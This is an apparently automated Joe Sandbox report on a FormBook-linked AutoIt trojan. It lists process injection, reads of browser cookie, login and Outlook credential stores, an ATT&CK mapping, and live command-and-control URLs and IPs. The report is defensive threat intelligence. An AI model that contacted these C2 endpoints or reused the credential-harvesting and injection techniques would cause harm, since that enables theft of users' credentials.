Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008FB106 LogonUserW
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0090411C SendInput,keybd_event
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_009074BB mouse_event
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"
Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_009071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: Certificate 11-21AIS.exe, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144732637.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: Certificate 11-21AIS.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144732637.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144732637.0000000001A50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008E65C4 cpuid
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0091091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0093B340 GetUserNameW
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008F1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_008DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Certificate 11-21AIS.exe | Binary or memory string: WIN_81
Source: Certificate 11-21AIS.exe | Binary or memory string: WIN_XP
Source: Certificate 11-21AIS.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Certificate 11-21AIS.exe | Binary or memory string: WIN_XPe
Source: Certificate 11-21AIS.exe | Binary or memory string: WIN_VISTA
Source: Certificate 11-21AIS.exe | Binary or memory string: WIN_7
Source: Certificate 11-21AIS.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_00918C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Certificate 11-21AIS.exe | Code function: 0_2_0091923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (listed per tactic column; a leading number is the match count shown in the matrix for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1560696 | Sample: Certificate 11-21AIS.exe | Startdate: 22/11/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
Sample-level DNS/IP: www.joyesi.xyz; www.techchains.info; 16 other IPs or domains (Performs DNS queries to domains with low reputation)

Process tree:
Certificate 11-21AIS.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    svchost.exe (started): Maps a DLL or memory area into another process
        YpYSxBPTXgWuOtxBGIerqOSW.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
            netbtugc.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                YpYSxBPTXgWuOtxBGIerqOSW.exe (injected): Found direct / indirect Syscall (likely to bypass EDR)
                    DNS/IP: www.rssnewscast.com 91.195.240.94, ports 49956, 49962, 49968, SEDO-ASDE Germany; elettrosistemista.zip 195.110.124.133, ports 50020, 50021, 50022, REGISTER-ASIT Italy; 5 other IPs or domains
                firefox.exe (started)

Source | Detection | Scanner | Label | Link
Certificate 11-21AIS.exe | 61% | ReversingLabs | Win32.Trojan.AutoitInject |
Certificate 11-21AIS.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.3xfootball.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= | 0% | Avira URL Cloud | safe
http://www.empowermedeco.com/fo8o/ | 0% | Avira URL Cloud | safe
http://www.elettrosistemista.zip/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= | 100% | Avira URL Cloud | malware
http://www.empowermedeco.com/fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp | 0% | Avira URL Cloud | safe
http://www.elettrosistemista.zip/fo8o/ | 100% | Avira URL Cloud | malware
http://www.magmadokum.com/fo8o/ | 0% | Avira URL Cloud | safe
http://www.rssnewscast.com/fo8o/ | 100% | Avira URL Cloud | malware
http://www.goldenjade-travel.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= | 100% | Avira URL Cloud | malware
http://www.goldenjade-travel.com/fo8o/ | 100% | Avira URL Cloud | malware
https://www.empowermedeco.com/fo8o/?Ml18S=mxnR | 0% | Avira URL Cloud | safe
http://www.rssnewscast.com/fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
elettrosistemista.zip | 195.110.124.133 | true | false | | high
empowermedeco.com | 217.196.55.202 | true | false | | high
www.3xfootball.com | 154.215.72.110 | true | false | | high
www.goldenjade-travel.com | 116.50.37.244 | true | false | | high
www.rssnewscast.com | 91.195.240.94 | true | false | | high
www.techchains.info | 66.29.149.46 | true | false | | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.magmadokum.com | unknown | unknown | false | | high
www.donnavariedades.com | unknown | unknown | false | | high
www.660danm.top | unknown | unknown | false | | high
www.joyesi.xyz | unknown | unknown | false | | high
www.liangyuen528.com | unknown | unknown | false | | high
www.kasegitai.tokyo | unknown | unknown | false | | high
www.empowermedeco.com | unknown | unknown | false | | high
www.k9vyp11no3.cfd | unknown | unknown | false | | high
www.elettrosistemista.zip | unknown | unknown | false | | high
www.antonio-vivaldi.mobi | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.3xfootball.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= | true | Avira URL Cloud: safe | unknown
http://www.empowermedeco.com/fo8o/ | true | Avira URL Cloud: safe | unknown
http://www.empowermedeco.com/fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp | true | Avira URL Cloud: safe | unknown
http://www.elettrosistemista.zip/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= | true | Avira URL Cloud: malware | unknown
http://www.elettrosistemista.zip/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.magmadokum.com/fo8o/ | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/ | true | Avira URL Cloud: malware | unknown
http://www.rssnewscast.com/fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp | true | Avira URL Cloud: malware | unknown
http://www.techchains.info/fo8o/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.empowermedeco.com | YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4146974677.00000000058C9000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000003.00000002.4145972280.000000000476E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4147607697.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.sedo.com/services/parking.php3 | YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.empowermedeco.com/fo8o/?Ml18S=mxnR | netbtugc.exe, 00000003.00000002.4145972280.00000000050DA000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000496A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560696
Start date and time: 2024-11-22 07:48:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Certificate 11-21AIS.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@14/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 51
• Number of non-executed functions: 295
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Certificate 11-21AIS.exe
Time | Type | Description
01:49:49 | API Interceptor | 10768315x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.195.240.94 | Certificate 1045-20-11.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 719A1120-2024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 64411-18.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-17.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rDocument11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | glued.hta | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rBALT-10212024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | rAGROTIS10599242024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
91.195.240.94 | oO3ZmCAeLQ.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
154.215.72.110 | wOoESPII08.exe | malicious | FormBook | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
154.215.72.110 | N2sgk6jMa2.exe | malicious | FormBook | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
154.215.72.110 | Document 151-512024.exe | malicious | FormBook | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
195.110.124.133 | Certificate 1045-20-11.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 719A1120-2024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 64411-18.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | Certificate 11-142024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | rDocument11-142024.exe | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.nutrigenfit.online/2vhi/
195.110.124.133 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook | www.nutrigenfit.online/2vhi/
195.110.124.133 | glued.hta | malicious | FormBook | www.elettrosistemista.zip/fo8o/
195.110.124.133 | proforma Invoice.exe | malicious | FormBook | www.nutrigenfit.online/xtuc/
195.110.124.133 | DHL_doc.exe | malicious | FormBook | www.nutrigenfit.online/uye5/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.3xfootball.com | Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 64411-18.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-17.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | Certificate 11-142024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | rDocument11-142024.exe | malicious | FormBook | 154.215.72.110
www.3xfootball.com | glued.hta | malicious | FormBook | 154.215.72.110
www.goldenjade-travel.com | Certificate 1045-20-11.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 719A1120-2024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-18720.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | RvJVMsNLJI.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 64411-18.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-17.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | Certificate 11-142024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | rDocument11-142024.exe | malicious | FormBook | 116.50.37.244
www.goldenjade-travel.com | glued.hta | malicious | FormBook | 116.50.37.244
